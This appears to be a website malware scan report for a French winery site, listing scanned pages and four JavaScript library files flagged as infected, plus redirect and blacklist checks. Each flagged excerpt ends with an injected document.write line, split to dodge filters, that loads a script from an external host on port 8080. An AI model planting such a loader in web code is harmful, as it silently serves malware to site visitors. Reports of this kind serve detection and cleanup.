Scanned pages/files
Request | Server response | Status |
http://tour-des-chenes.com/ | 200 OK Content-Length: 6438 Content-Type: text/html | clean |
http://tour-des-chenes.com/appelation.htm | 200 OK Content-Length: 6169 Content-Type: text/html | clean |
http://tour-des-chenes.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 3341 Content-Type: application/x-javascript | malicious |
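Malicious code - confirmed by antiviruses (see below). The excerpt is abridged: it shows the start and the end of the file, with the middle omitted. The library functions are ordinary; the injected part is the final document.write(...) statement, which writes a script tag (split across string concatenations) that loads a script from an external host on port 8080. The identical statement ends all four flagged files in this report, so scripts on the site that the scan did not fetch are worth comparing against known-good copies too.
function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; } function AC_Generateobj(objAttrs, params, embedAttrs) { var str = '<object '; for (var i in objAttrs) str += i + '="' + objAttrs[i] + '" '; str += '>'; for (var i in params) str += '<param name="' + i + '" value="' + params[i] + '" /> '; str += '<embed '; for ( case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } document.write('<s'+'cript type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></scr'+'ipt>');
Antivirus reports: (no antivirus entries are shown on this page)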
http://tour-des-chenes.com/vignoble.htm | 200 OK Content-Length: 4666 Content-Type: text/html | clean |
http://tour-des-chenes.com/cepages.htm | 200 OK Content-Length: 6850 Content-Type: text/html | clean |
http://tour-des-chenes.com/cuvees.htm | 200 OK Content-Length: 7252 Content-Type: text/html | clean |
http://tour-des-chenes.com/temoignages.htm | 200 OK Content-Length: 4664 Content-Type: text/html | clean |
http://tour-des-chenes.com/lightbox/js/prototype.js | 200 OK Content-Length: 47711 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt is abridged: it shows the start and the end of the file, with the middle omitted. The Prototype 1.4.0 library code is ordinary; the injected part is the final document.write(...) statement, which loads a script from an external host on port 8080.
var Prototype = { Version: '1.4.0', ScriptFragment: '(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)', emptyFunction: function() {}, K: function(x) {return x} } var Class = { create: function() { return function() { this.initialize.apply(this, arguments); } } } var Abstract = new Object(); Object.extend = function(destination, source) { for (property in source) { destination[property] = source[ do { valueT += element.offsetTop || 0; valueL += element.offsetLeft || 0; if (element.offsetParent == document.body) if (Element.getStyle(element, 'position') == 'absolute') break; element = element.offsetParent; } while (element); return [valueL, valueT]; } } document.write('<s'+'cript type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></scr'+'ipt>');
Antivirus reports: (no antivirus entries are shown on this page)
http://tour-des-chenes.com/lightbox/js/scriptaculous.js?load=effects | 200 OK Content-Length: 2260 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt appears to be abridged (part of the load function is missing). The script.aculo.us 1.5.1 loader code is ordinary; the injected part is the final document.write(...) statement after Scriptaculous.load(), which loads a script from an external host on port 8080.
var Scriptaculous = { Version: '1.5.1', require: function(libraryName) { document.write('<script type="text/javascript" src="'+libraryName+'"></script>'); }, load: function() { if((typeof Prototype=='undefined') || parseFloat(Prototype.Version.split(".")[0] + "." + Prototype.Version.split(".")[1]) < 1.4) throw("script.aculo.us requires the Prototype JavaScript framework >= 1.4.0"); var path = s.src.replace(/scriptaculous\.js(\?.*)?$/,''); var includes = s.src.match(/\?.*load=([a-z,]*)/); (includes ? includes[1] : 'builder,effects,dragdrop,controls,slider').split(',').each( function(include) { Scriptaculous.require(path+include+'.js') }); }); } } Scriptaculous.load(); document.write('<s'+'cript type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></scr'+'ipt>');
Antivirus reports: (no antivirus entries are shown on this page)
http://tour-des-chenes.com/lightbox/js/lightbox.js | 200 OK Content-Length: 20141 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt is abridged: it shows the start and the end of the file, with the middle omitted. The Lightbox code is ordinary; the injected part is the final document.write(...) statement after the Event.observe call, which loads a script from an external host on port 8080.
var fileLoadingImage = "../lightbox/images/loading.gif"; var fileBottomNavCloseImage = "../lightbox/images/close.gif"; var resizeSpeed = 7; var borderSize = 10; var imageArray = new Array; var activeImage; if(resizeSpeed > 10){ resizeSpeed = 10;} if(resizeSpeed < 1){ resizeSpeed = 1;} resizeDuration = (11 - resizeSpeed) * 0.15; Object.extend(Element, { getWidth: function(element) { element = $(element); return element.offsetWid } } function pause(numberMillis) { var now = new Date(); var exitTime = now.getTime() + numberMillis; while (true) { now = new Date(); if (now.getTime() > exitTime) return; } } function initLightbox() { myLightbox = new Lightbox(); } Event.observe(window, 'load', initLightbox, false); document.write('<s'+'cript type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></scr'+'ipt>');
Antivirus reports: (no antivirus entries are shown on this page)
http://tour-des-chenes.com/batiment.htm | 200 OK Content-Length: 6241 Content-Type: text/html | clean |
http://tour-des-chenes.com/salles.htm | 200 OK Content-Length: 5725 Content-Type: text/html | clean |
http://tour-des-chenes.com/cave.htm | 200 OK Content-Length: 5953 Content-Type: text/html | clean |
http://tour-des-chenes.com/jardins.htm | 200 OK Content-Length: 5707 Content-Type: text/html | clean |
http://tour-des-chenes.com/services_r.htm | 200 OK Content-Length: 5940 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tour-des-chenes.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 14:03:40 GMT
Server: Apache/2.2.3 (Debian) mod_ssl/2.2.3 OpenSSL/0.9.8c
Content-Language: fr
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: PHP/5.2.9
GET / HTTP/1.1
Host: tour-des-chenes.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 14:03:40 GMT
Server: Apache/2.2.3 (Debian) mod_ssl/2.2.3 OpenSSL/0.9.8c
Content-Language: fr
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: PHP/5.2.9
Second query (visit from search engine):
GET / HTTP/1.1
Host: tour-des-chenes.com
Referer: http://www.google.com/search?q=tour-des-chenes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tour-des-chenes.com
Referer: http://www.google.com/search?q=tour-des-chenes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tour-des-chenes.com
Result: This site is not currently listed as suspicious. (This reflects only the blacklist's own listing at query time; it does not clear the four scripts flagged as malicious in the file scan above.)
Query: http://yandex.com/infected?l10n=en&url=http://tour-des-chenes.com/
Result: tour-des-chenes.com is not infected or malware details are not published yet. (As the wording itself allows, this is not a clean verdict; the four scripts flagged in the file scan above remain flagged.)